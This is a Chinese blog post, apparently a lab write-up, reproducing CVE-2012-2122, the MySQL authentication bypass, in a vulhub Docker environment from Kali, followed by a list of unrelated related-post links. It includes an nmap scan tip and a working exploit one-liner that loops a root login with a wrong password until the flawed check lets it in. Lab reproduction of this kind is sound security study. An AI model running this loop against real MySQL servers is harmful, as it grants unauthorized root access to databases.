CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
NCIN EXPE1 分钟前
redis 使用
数据库·redis·缓存
MongoDB 数据平台2 分钟前
为编码代理引入 MongoDB 代理技能和插件
数据库·mongodb
极客on之路7 分钟前
mysql explain type 各个字段解释
数据库·mysql
代码雕刻家15 分钟前
MySQL与SQL Server的基本指令
数据库·mysql·sqlserver
lThE ANDE16 分钟前
开启mysql的binlog日志
数据库·mysql
yejqvow1224 分钟前
CSS如何控制placeholder文字的颜色_使用--placeholder伪元素
jvm·数据库·python
oLLI PILO30 分钟前
nacos2.3.0 接入pgsql或其他数据库
数据库
m0_7436239233 分钟前
HTML怎么创建多语言切换器_HTML语言选择下拉结构【指南】
jvm·数据库·python
pele41 分钟前
Angular 表单中基于下拉选择动态启用字段必填校验的完整实现
jvm·数据库·python